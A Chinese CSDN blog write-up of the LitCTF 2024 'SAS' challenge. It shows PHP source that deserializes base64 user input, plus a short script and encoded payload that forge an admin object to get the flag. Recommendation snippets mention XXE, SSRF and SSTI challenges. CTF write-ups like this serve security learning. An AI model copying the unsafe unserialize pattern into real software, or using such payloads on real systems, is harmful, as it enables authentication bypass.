[LitCTF 2024]SAS - Serializing Authentication

于 2024-09-13 21:45:57 发布
阅读量225 收藏
点赞数 1
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81462177/article/details/142220248
版权

题目提示反序列化

源码


<?php

class User {

    public $username;

    public $password;

    function __construct($username, $password) {

        $this->username = $username;

        $this->password = $password;

    }

    function isValid() { return $this->username === 'admin' && $this->password === 'secure_password'; }

}

?>

题目中有一行$user = unserialize(base64_decode($data));
//将一个Base64编码的字符串$data解码并反序列化

根据编码写出解题脚本 

<?php

class User{
    public $username;
    public $password;
}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo base64_encode(serialize($a));

?>

运行结果

Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=

输入后出现flag 

桑榆百川
关注
LITCTF2024-6月web方向wp
Perterluck的博客
06-02 973
这个题目考察XXE注入,这个从题目就可看出来(翻转一下就可),了解一下XXE注入,主要了解XML格式和其中DOCTYPE还有主体ENTITY的定义,重点利用的是外部实体注入攻击,因为服务器会直接将xml传送的内容做引用,这样便可以通过一些伪协议找到flag。dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:注意这个协议使用的前提是服务器的端口可以拿到,这个没啥好方法,除非直接告诉你否则就爆破吧。这个就是一个反序列化,没啥好说的,直接按照要求就可拿到flag。
LitCTF 2024(公开赛道)——WP
ASD830的博客
06-02 1961
目录Misc涐贪恋和伱、甾―⑺dé毎兮毎秒你说得对,但__盯帧珍珠Everywhere We Go关键,太关键了!女装照流量原铁,启动!舔到最后应有尽有The loveWebexx一个....池子?SAS - Serializing Authentication System浏览器也能套娃?高亮主题(划掉)背景查看器百万美元的诱惑Reverse编码喵Cryptocommon_primes题目只给了一张图片,zesteg秒了,flag:LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5b
LitCTF 2024 web&misc wp
Nanian233的博客
06-05 1073
Litctf 2024 个人题解
LitCTF2024WP
qq_67760645的博客
06-02 1052
LitCTF2024的解题思路
LitCTF 2024(公开赛道)部分 wp
焦虑的焦虑
06-04 2088
LitCTF 2024(公开赛道)部分 wp
【Web】LitCTF 2024 题解(全)
uuzeray的博客
07-25 735
file:///flag直接读本地文件。参考ctfshow web57。访问./dollar.php。以xml形式传数据,打xxe。{{7*7}}测出SSTI。随便找个payload打了。随便试一试,一眼ssrf。目录穿越拿到flag。
探姬杯LitCTF2024(Web方向)
Zue3r的博客
06-02 811
探姬杯LitCTF2024(Web方向)
LitCTF2024赛后web复现
2301_80913334的博客
07-29 731
用hackbar打开post传参一下theme=/etc/passwd发现有报错信息不能打开这个文件且现在的路径是themes//etc/p说明当前页面的路径是themes,可能存在漏洞。尝试输入http://127.0.0.1发现跳出一个相同页面,输入http://www.baidu.com发现跳转到了百度页面,这里我们可以想到可能是ssrf漏洞。既然有/etc/passwd这个目录存在且里面也没有发现flag的相关信息,尝试查看一下/flag目录存在不存在,直接得到flag。
LitCTF2024 web方向题解
5fn
08-12 1238
LitCTF2024 web方向的题做完了。这里奉上题解一份。题解是比较小白方向的。刚入门web安全的可以去做一下。LitCTF的题其实都很适合新手练手,非常推荐新手入门食用。 结合NSSCTF靶场,每道题上都有考查方向。
Serializing Interfaces in SAP AIF.zip
06-01
sap press doc 解压密码:abap_developer
Java 问题和分析 Serializing a primitive with ObjectOutStream
10-10
Java 对象序列化和 ObjectOutStream Java 序列化是一种将对象图表示为字节序列的机制,直接支持原始数据类型作为对象的一部分。原始类型的包装类也实现了 Serializable 接口,因此也可以进行序列化。...
LitCTF2024 郑州轻工业大学首届网络安全赛 WP 部分_[litctf 2024]vim yyds
2301_79054215的博客
04-13 1425
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。(img-UjorHS4E-1712969539868)]发现第一条凤凰网报道中提到了。
CVE-2024-2193 GHOSTRACE:Exploiting and Mitigating Speculative Race Conditions(推测竞争条件的利用和缓解)ARM安全中心
security²-卢鸿波-安全二次方
03-25 1021
2024年3月,一个研究小组发表了一篇名为《GhostRace: Exploiting and Mitigating Speculative Race Conditions》的论文。该论文演示了一种 Spectre v1 变体,利用内核中的“推测使用后释放(speculative use-after-free)漏洞”来推测性地劫持控制流,并泄露内核内存。这个变体已被分配了CVE-2024-2193编号。
tpm2-tools源码分析之tpm2_load.c(6)
phmatthaus的专栏
04-10 692
tpm2-tools源码分析之tpm2_load.c(6)
Android Radio2.0——公告监听设置(四)
小旭的专栏
09-10 528
上一篇文章我们介绍了广播公告的注册及监听设置,这里我们来看一下广播公告添加监听的调用流程。
【兼容性记录】video标签在 IOS 和 安卓中的问题
fans_x的博客
09-13 845
业务需求背景:由于业务中涉及到有视频播放的内容,所以就使用了video标签去做,但是video标签在ios 设备和安卓设备中的默认行为不一致,故记录下解决方法(折中办法)。
Android 内置应用裁剪
最新发布
Framework-coder的博客
09-13 118
参考 AOSP 中 PRODUCT_PACKAGES 配置的方式,自定义一个“PRODUCT_PACKAGES_REMOVE”配 置选项。用户可根据自身项目的需要,将需裁剪的 APK 名称(无需 .apk 后缀) 都添加到“PRODUCT_PACKAGES_REMOVE”项下,从而做到一次性全部裁剪。此方法省去了查找目标 APK 的编译.mk 文件的时间,提高了工作效率。补丁如下:从以上补丁可以发现,只要是添加在“PRODUCT_PACKAGES_REMOVE”配置项下的 APK 都将被裁剪。
android 14.0 USB连接模式默认设为MTP
安卓兼职framework和app工程师的博客
09-13 327
在14.0android系统产品开发中,在通过otg连接设备的时候,会弹出usb连接模式这时候会让客户选择当前连接电脑是 哪种模式,在项目开发中,需要以mtp模式,就是可以在电脑查看设备的内部存储的样式来设置otg连接电脑的模式, 接下来分析下相关模式,来具体实现相关功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值